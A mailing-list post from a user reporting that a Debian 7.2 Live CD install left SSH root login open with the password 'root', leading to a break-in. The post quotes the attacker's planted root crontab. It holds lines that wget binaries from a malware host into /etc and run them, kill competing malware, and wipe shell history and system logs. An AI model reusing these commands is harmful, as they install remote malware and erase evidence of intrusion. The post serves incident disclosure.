Live CD default sshd install allowed root privileges to be gained

[Rihad <grihad@gmail.com>]

Hi, on Jan 9th I installed Debian 7.2 amd64 Live CD from scratch after 
my hard disk w/ Kubuntu had crashed. On Jan 23, I accidentally found 
that the following root personal crontab was somehow installed on Jan 
10th (the file is 4039 lines long, and I haven't been able to post it 
here probably due to mailing list's limitations):

> s file to introduce tasks to be run by cron.
> #
> # Each task to run has to be defined through a single line
> # indicating with different fields when the task will be run
> # and what command to run for the task
> #
> # To define the time you can provide concrete values for
> # minute (m), hour (h), day of month (dom), month (mon),
> # and day of week (dow) or use '*' in these fields (for 'any').#
> # Notice that tasks will be started based on the cron's system
> # daemon's notion of time and timezones.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> #
> # Each task to run has to be defined through a single line
> # indicating with different fields when the task will be run
> # and what command to run for the task
> #
> # To define the time you can provide concrete values for
> # minute (m), hour (h), day of month (dom), month (mon),
> # and day of week (dow) or use '*' in these fields (for 'any').#
> # Notice that tasks will be started based on the cron's system
> # daemon's notion of time and timezones.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> #
> # Each task to run has to be defined through a single line
> # indicating with different fields when the task will be run
> # and what command to run for the task
> #
> # To define the time you can provide concrete values for
> # minute (m), hour (h), day of month (dom), month (mon),
> # and day of week (dow) or use '*' in these fields (for 'any').#
> # Notice that tasks will be started based on the cron's system
> # daemon's notion of time and timezones.
> #
> # Output of the crontab jobs (including errors) is sent through
> # email to the user the crontab file belongs to (unless redirected).
> #
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> #
> # Each task to run has to be defined through a single line
> # indicating with different fields when the task will be run
> # and what command to run for the task
> #
> # To define the time you can provide concrete values for
> # minute (m), hour (h), day of month (dom), month (mon),
> # and day of week (dow) or use '*' in these fields (for 'any').#
> # Notice that tasks will be started based on the cron's system
> # daemon's notion of time and timezones.
> #
> # Output of the crontab jobs (including errors) is sent through
> # email to the user the crontab file belongs to (unless redirected).
> #
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> #
> # Each task to run has to be defined through a single line
> # indicating with different fields when the task will be run
> # and what command to run for the task
> #
> # To define the time you can provide concrete values for
> # minute (m), hour (h), day of month (dom), month (mon),
> # and day of week (dow) or use '*' in these fields (for 'any').#
> # Notice that tasks will be started based on the cron's system
> # daemon's notion of time and timezones.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> #
> # Each task to run has to be defined through a single line
> # indicating with different fields when the task will be run
> # and what command to run for the task
> #
> # To define the time you can provide concrete values for
> # minute (m), hour (h), day of month (dom), month (mon),
> # and day of week (dow) or use '*' in these fields (for 'any').#
> # Notice that tasks will be started based on the cron's system
> # daemon's notion of time and timezones.
> #
> # Output of the crontab jobs (including errors) is sent through
> # email to the user the crontab file belongs to (unless redirected).
> #
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> #
> # Each task to run has to be defined through a single line
> # indicating with different fields when the task will be run
> # and what command to run for the task
> #
> # To define the time you can provide concrete values for
> # minute (m), hour (h), day of month (dom), month (mon),
> # and day of week (dow) or use '*' in these fields (for 'any').#
> # Notice that tasks will be started based on the cron's system
> # daemon's notion of time and timezones.
> #
> # Output of the crontab jobs (including errors) is sent through
> # email to the user the crontab file belongs to (unless redirected).
> #
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> #
> # Each task to run has to be defined through a single line
> # indicating with different fields when the task will be run
> # and what command to run for the task
> #
> # To define the time you can provide concrete values for
> # minute (m), hour (h), day of month (dom), month (mon),
> # and day of week (dow) or use '*' in these fields (for 'any').#
> # Notice that tasks will be started based on the cron's system
> # daemon's notion of time and timezones.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> #
> # Each task to run has to be defined through a single line
> # indicating with different fields when the task will be run
> # and what command to run for the task
> #
> # To define the time you can provide concrete values for
> # minute (m), hour (h), day of month (dom), month (mon),
> # and day of week (dow) or use '*' in these fields (for 'any').#
> # Notice that tasks will be started based on the cron's system
> # daemon's notion of time and timezones.
> #
> # Output of the crontab jobs (including errors) is sent through
> # email to the user the crontab file belongs to (unless redirected).
> #
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> #
> # Each task to run has to be defined through a single line
> # indicating with different fields when the task will be run
> # and what command to run for the task
> #
> # To define the time you can provide concrete values for
> # minute (m), hour (h), day of month (dom), month (mon),
> # and day of week (dow) or use '*' in these fields (for 'any').#
> # Notice that tasks will be started based on the cron's system
> # daemon's notion of time and timezones.
> #
> # Output of the crontab jobs (including errors) is sent through
> # email to the user the crontab file belongs to (unless redirected).
> #
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> #
> # Each task to run has to be defined through a single line
> # indicating with different fields when the task will be run
> # and what command to run for the task
> #
> # To define the time you can provide concrete values for
> # minute (m), hour (h), day of month (dom), month (mon),
> # and day of week (dow) or use '*' in these fields (for 'any').#
> # Notice that tasks will be started based on the cron's system
> # daemon's notion of time and timezones.
> #
> # Output of the crontab jobs (including errors) is sent through
> # email to the user the crontab file belongs to (unless redirected).
> #
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> #
> # Each task to run has to be defined through a single line
> # indicating with different fields when the task will be run
> # and what command to run for the task
> #
> # To define the time you can provide concrete values for
> # minute (m), hour (h), day of month (dom), month (mon),
> # and day of week (dow) or use '*' in these fields (for 'any').#
> # Notice that tasks will be started based on the cron's system
> # daemon's notion of time and timezones.
> #
> # Output of the crontab jobs (including errors) is sent through
> # email to the user the crontab file belongs to (unless redirected).
> #
> # Edit this file to introduce tasks to be run by cron.
> # Edit this file to introduce tasks to be run by cron.
> */1 * * * * killall -9 .IptabLes
> # Edit this file to introduce tasks to be run by cron.
> #
> # Each task to run has to be defined through a single line
> # indicating with different fields when the task will be run
> # and what command to run for the task



(Note "*/1 * * * * killall -9 .IptabLes" above)




Which, after comments have been removed, is basically this:

> s file to introduce tasks to be run by cron.
> */1 * * * * killall -9 .IptabLes
> */1 * * * * killall -9 nfsd4
> */1 * * * * killall -9 profild.key
> */1 * * * * killall -9 nfsd
> */1 * * * * killall -9 DDosl
> */1 * * * * killall -9 lengchao32
> */1 * * * * killall -9 b26
> */1 * * * * killall -9 codelove
> */1 * * * * killall -9 32
> */1 * * * * killall -9 64
> */1 * * * * killall -9 new6
> */1 * * * * killall -9 new4
> */1 * * * * killall -9 node24
> */1 * * * * killall -9 freeBSD
> */99 * * * * killall -9 cupsdd
> */99 * * * * killall -9 kysapd
> */98 * * * * killall -9 atdd
> */97 * * * * killall -9 kysapd
> */96 * * * * killall -9 skysapd
> */95 * * * * killall -9 xfsdx
> */94 * * * * killall -9 ksapd
> */120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
> */120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
> */130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
> */130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
> */140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
> */140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
> */120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
> */120 * * * * cd /root;rm -rf dir nohup.out
> */360 * * * * cd /etc;rm -rf dir atdd
> */360 * * * * cd /etc;rm -rf dir ksapd
> */360 * * * * cd /etc;rm -rf dir kysapd
> */360 * * * * cd /etc;rm -rf dir skysapd
> */360 * * * * cd /etc;rm -rf dir sksapd
> */360 * * * * cd /etc;rm -rf dir xfsdx
> */1 * * * * cd /etc;rm -rf dir cupsdd.*
> */1 * * * * cd /etc;rm -rf dir atdd.*
> */1 * * * * cd /etc;rm -rf dir ksapd.*
> */1 * * * * cd /etc;rm -rf dir kysapd.*
> */1 * * * * cd /etc;rm -rf dir skysapd.*
> */1 * * * * cd /etc;rm -rf dir sksapd.*
> */1 * * * * cd /etc;rm -rf dir xfsdx.*
> */1 * * * * chmod 7777 /etc/atdd
> */1 * * * * chmod 7777 /etc/cupsdd
> */1 * * * * chmod 7777 /etc/ksapd
> */1 * * * * chmod 7777 /etc/kysapd
> */1 * * * * chmod 7777 /etc/skysapd
> */1 * * * * chmod 7777 /etc/sksapd
> */1 * * * * chmod 7777 /etc/xfsdx
> */1 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
> */100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
> */99 * * * * nohup /etc/atdd > /dev/null 2>&1&
> */98 * * * * nohup /etc/kysapd > /dev/null 2>&1&
> */97 * * * * nohup /etc/skysapd > /dev/null 2>&1&
> */96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&
> */95 * * * * nohup /etc/ksapd > /dev/null 2>&1&
> */1 * * * * echo "unset MAILCHECK" >> /etc/profile
> */1 * * * * rm -rf /root/.bash_history
> */1 * * * * touch /root/.bash_history
> */1 * * * * history -r
> */1 * * * * cd /var/log > dmesg
> */1 * * * * cd /var/log > auth.log
> */1 * * * * cd /var/log > alternatives.log
> */1 * * * * cd /var/log > boot.log
> */1 * * * * cd /var/log > btmp
> */1 * * * * cd /var/log > cron
> */1 * * * * cd /var/log > cups
> */1 * * * * cd /var/log > daemon.log
> */1 * * * * cd /var/log > dpkg.log
> */1 * * * * cd /var/log > faillog
> */1 * * * * cd /var/log > kern.log
> */1 * * * * cd /var/log > lastlog
> */1 * * * * cd /var/log > maillog
> */1 * * * * cd /var/log > user.log
> */1 * * * * cd /var/log > Xorg.x.log
> */1 * * * * cd /var/log > anaconda.log
> */1 * * * * cd /var/log > yum.log
> */1 * * * * cd /var/log > secure
> */1 * * * * cd /var/log > wtmp
> */1 * * * * cd /var/log > utmp
> */1 * * * * cd /var/log > messages
> */1 * * * * cd /var/log > spooler
> */1 * * * * cd /var/log > sudolog
> */1 * * * * cd /var/log > aculog
> */1 * * * * cd /var/log > access-log
> */1 * * * * cd /root > .bash_history
> */1 * * * * history -c

I believe thanks to the initial "s" the crontab syntax was incorrect so 
nothing got to run.
This was really shown to emphasize what will follow.
The break in was caused by the fact that Debian's Live CD installed and 
enabled SSH server to run (with PermitRootLogin enabled) without telling 
me about it - I don't need an SSH server at home and would never run it 
in this way with an easy to guess root password, which was simply root, 
because I would never use the root account for logging in via network 
and would definitely harden SSH configuration with AllowUsers, public 
keys, firewall etc. I did install & enable a permissive iptables 
firewall ("deny by default"), but a day or two after the break-in, long 
before I detected the intrusion and what caused it.